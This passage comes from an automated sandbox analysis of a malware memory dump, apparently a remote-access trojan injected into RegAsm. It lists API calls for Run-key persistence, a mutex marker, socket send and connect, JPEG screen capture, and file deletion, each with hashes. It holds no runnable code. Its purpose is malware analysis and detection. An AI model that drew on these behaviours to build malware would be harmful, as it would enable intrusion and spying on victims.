                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3919263394-0
                                                                                                                                                                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                                                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                                          • API String ID: 1291196975-3785015651
                                                                                                                                                                                          • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                                          • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                                                                                                                                          • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00413A80
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteOpenValue
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                          • API String ID: 2654517830-1051519024
                                                                                                                                                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                                          • API String ID: 3325800564-4028850238
                                                                                                                                                                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                                                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                          • String ID: Rmc-UP4CTA
                                                                                                                                                                                          • API String ID: 1925916568-3045082178
                                                                                                                                                                                          • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                                                                          • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                                                                                          • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3963590051-0
                                                                                                                                                                                          • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                                          • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                                          • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                                                                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                                                                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,012D56C0,00000010), ref: 004048E0
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GdiplusStartupconnectsend
                                                                                                                                                                                          • String ID: NG
                                                                                                                                                                                          • API String ID: 1957403310-1651712548
                                                                                                                                                                                          • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                                                                                                                                                                          • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: pQG
                                                                                                                                                                                          • API String ID: 176396367-3769108836
                                                                                                                                                                                          • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 1890195054-2766056989
                                                                                                                                                                                          • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                                                                                                                                                                          • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 1890195054-2766056989
                                                                                                                                                                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00446227
                                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap$_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1482568997-0
                                                                                                                                                                                          • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                                                                                                                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                                                                                                                          • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateEventStartupsocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1953588214-0
                                                                                                                                                                                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
